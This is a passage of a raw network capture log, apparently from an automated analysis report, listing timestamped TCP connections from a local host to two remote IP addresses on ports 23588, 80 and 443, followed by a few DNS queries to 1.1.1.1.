                                                                                                                                          Dec 19, 2024 15:36:44.487768888 CET5283223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:44.488199949 CET5283223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:44.528937101 CET2358852878107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:44.529062986 CET5287823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:44.533876896 CET5287823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:44.607790947 CET2358852832107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:44.653487921 CET2358852878107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:45.759814024 CET51650443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:45.759911060 CET44351650116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:45.759979963 CET51650443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:45.881273985 CET5040780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:45.881692886 CET5336880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:46.001282930 CET8050407116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:46.001324892 CET8053368116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:46.001432896 CET5040780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:46.001435041 CET5336880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:46.002109051 CET5336880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:46.121721029 CET8053368116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:47.818226099 CET8053368116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:47.818286896 CET5336880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:47.866609097 CET54791443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:47.866668940 CET44354791116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:47.866929054 CET54791443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:47.868967056 CET54791443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:47.868976116 CET44354791116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:48.433805943 CET54791443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:48.433842897 CET5283223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:48.433897972 CET5287823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:48.466167927 CET5480423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:48.585943937 CET2358854804107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:48.586039066 CET5480423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:48.589313030 CET5480423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:48.603214979 CET5482323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:48.606996059 CET5336880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:48.607310057 CET5482480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:48.708863974 CET2358854804107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:48.723617077 CET2358854823107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:48.723700047 CET5482323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:48.724044085 CET5482323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:48.727288008 CET8054824116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:48.727375031 CET5482480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:48.727757931 CET8053368116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:48.727828026 CET5336880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:48.728028059 CET5482480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:48.845545053 CET2358854823107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:48.848674059 CET8054824116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:50.547456026 CET8054824116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:50.547672033 CET5482480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:50.672265053 CET55957443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:50.672307014 CET44355957116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:50.672395945 CET55957443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:50.712429047 CET55957443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:50.712456942 CET44355957116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:52.594919920 CET5482323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:52.595125914 CET55957443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:52.595139027 CET5480423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:52.713757038 CET5689023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:52.714771986 CET5482480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:52.715354919 CET5689280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:52.715756893 CET5689323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:52.833677053 CET2358856890107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:52.833853006 CET5689023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:52.834722996 CET5689023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:52.835138083 CET8054824116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:52.835153103 CET8056892116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:52.835202932 CET5482480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:52.835279942 CET5689280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:52.835381985 CET2358856893107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:52.835452080 CET5689323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:52.836296082 CET5689280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:52.836488008 CET5689323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:52.955065966 CET2358856890107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:52.956576109 CET8056892116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:52.956716061 CET2358856893107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:54.668972015 CET8056892116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:54.669044971 CET5689280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:54.688473940 CET58306443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:54.688539028 CET44358306116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:54.688632965 CET58306443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:54.689795971 CET58306443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:54.689815998 CET44358306116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:56.748970985 CET58306443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:56.749020100 CET5689023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.749141932 CET5689323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.750369072 CET5923123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.869934082 CET2358859231107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:56.870016098 CET5923123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.870379925 CET5923123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.871695995 CET5931323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.872481108 CET5689280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:56.872828007 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:56.989897966 CET2358859231107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:56.991513014 CET2358859313107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:56.991592884 CET5931323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.992275000 CET8059314116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:56.993143082 CET5931323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:56.993324041 CET8056892116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:56.993376017 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:56.993376017 CET5689280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:56.995450974 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:57.112663031 CET2358859313107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:57.114882946 CET8059314116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:58.732543945 CET8059314116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:58.732633114 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:58.741523981 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:58.741627932 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:58.741710901 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:58.743642092 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:58.743674994 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:00.649457932 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:00.649578094 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:00.650234938 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:00.650386095 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:00.876746893 CET5923123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:00.876780987 CET5931323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:00.877686977 CET6195223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:00.997287035 CET2358861952107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:00.997387886 CET6195223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:00.998501062 CET6195223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:01.103604078 CET6204523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:01.118195057 CET2358861952107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:01.223381996 CET2358862045107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:01.223460913 CET6204523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:01.225375891 CET6204523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:01.345917940 CET2358862045107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:02.536020041 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.536134958 CET44360620116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:02.536293030 CET60620443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.650284052 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.650924921 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.770680904 CET8059314116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:02.770776033 CET5931480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.773611069 CET8062377116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:02.773919106 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.775393009 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:02.895032883 CET8062377116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:04.473983049 CET8062377116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:04.474073887 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:04.488447905 CET63551443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:04.488523960 CET44363551116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:04.488626003 CET63551443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:04.489355087 CET63551443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:04.489373922 CET44363551116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.001203060 CET6204523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.001243114 CET63551443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.001270056 CET6195223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.001990080 CET6379023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.118150949 CET6380923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.118236065 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.118426085 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.121505976 CET2358863790107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.121602058 CET6379023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.121875048 CET6379023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.239053011 CET2358863809107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.239121914 CET8063810116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.239130974 CET6380923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.239132881 CET8062377116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.239175081 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.239207029 CET6237780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.239483118 CET6380923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:05.239799976 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:05.241436958 CET2358863790107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.358922958 CET2358863809107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:05.359240055 CET8063810116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:06.982880116 CET8063810116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:06.983025074 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.216377974 CET64603443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.216437101 CET44364603116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.217262983 CET64603443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.218295097 CET64603443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.218308926 CET44364603116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.518572092 CET64603443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.518666983 CET6379023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.518717051 CET6380923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.645761013 CET6471523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.648968935 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.649265051 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.655323029 CET6471823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.766356945 CET2358864715107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.766583920 CET6471523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.767843962 CET6471523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.769457102 CET8064717116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.769547939 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.769594908 CET8063810116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.769650936 CET6381080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.770389080 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:07.774921894 CET2358864718107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.775024891 CET6471823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.775340080 CET6471823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:07.887434006 CET2358864715107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.889822006 CET8064717116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:07.894954920 CET2358864718107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:09.575462103 CET8064717116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:09.575587034 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:09.591331959 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:09.591382027 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:09.591630936 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:09.683914900 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:09.683934927 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:11.554908991 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:11.555066109 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:11.555706024 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:11.555982113 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:11.642376900 CET6471523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.642579079 CET6471823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.643481016 CET5054323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.765625000 CET2358850543107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:11.765700102 CET5054323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.770831108 CET5054323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:11.891180992 CET2358850543107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:12.004265070 CET5060823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:12.124125957 CET2358850608107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:12.124205112 CET5060823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:12.126693010 CET5060823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:12.246392012 CET2358850608107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.573978901 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.574076891 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.574321985 CET44349251116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.574399948 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.574399948 CET49251443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.719305038 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.719660044 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.839224100 CET8051632116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.839306116 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.839375973 CET8064717116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:13.839441061 CET6471780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.840508938 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:13.960167885 CET8051632116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:15.634984970 CET8051632116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:15.635195017 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:15.657020092 CET52665443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:15.657097101 CET44352665116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:15.657252073 CET52665443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:15.657500029 CET52665443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:15.657517910 CET44352665116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:15.818984032 CET5060823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:15.819026947 CET5054323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:15.819056988 CET52665443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:15.900742054 CET5268623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:16.020535946 CET2358852686107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:16.020637035 CET5268623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:16.189594030 CET5268623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:16.237232924 CET5268823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:16.237350941 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:16.237600088 CET5268980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:16.309221983 CET2358852686107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:16.357059956 CET2358852688107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:16.357131958 CET5268823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:16.357139111 CET8052689116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:16.357181072 CET5268980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:16.357449055 CET8051632116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:16.357491970 CET5163280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:16.358040094 CET5268823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:16.358164072 CET5268980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:16.477511883 CET2358852688107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:16.477621078 CET8052689116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:18.875391006 CET8052689116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:18.875741959 CET5268980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:19.266244888 CET53480443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:19.266371965 CET44353480116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:19.266452074 CET53480443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:19.323415995 CET53480443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:19.323451996 CET44353480116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:20.197770119 CET53480443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:20.197833061 CET5268823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:20.197839975 CET5268623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:20.232716084 CET5348723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:20.351953983 CET5268980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:20.352251053 CET5353380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:20.352477074 CET5353423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:20.352483988 CET2358853487107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:20.352580070 CET5348723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:20.353724957 CET5348723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:20.471946001 CET8053533116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:20.472043991 CET8052689116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:20.472083092 CET2358853534107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:20.472083092 CET5353380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:20.472100019 CET5268980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:20.472134113 CET5353423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:20.473211050 CET2358853487107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:20.473606110 CET5353380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:20.473736048 CET5353423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:20.593967915 CET8053533116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:20.594010115 CET2358853534107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:22.180335999 CET8053533116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:22.180428982 CET5353380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:37:42.238637924 CET2358853487107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:42.238712072 CET5348723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:42.379195929 CET2358853534107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:42.379327059 CET5353423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:37:52.180843115 CET8053533116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:37:52.181045055 CET5353380192.168.2.5116.133.8.92

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 19, 2024 15:33:40.355006933 CET5319453192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:33:41.301969051 CET53531941.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:44.970244884 CET5494753192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:33:45.109034061 CET53549471.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:46.495070934 CET5425153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:33:47.156048059 CET53542511.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:50.021511078 CET5105953192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:33:50.158442974 CET53510591.1.1.1192.168.2.5
                                                                                                                                          Dec 19, 2024 15:33:54.955218077 CET5787153192.168.2.51.1.1.1
                                                                                                                                          Dec 19, 2024 15:33:55.093219042 CET53578711.1.1.1192.168.2.5
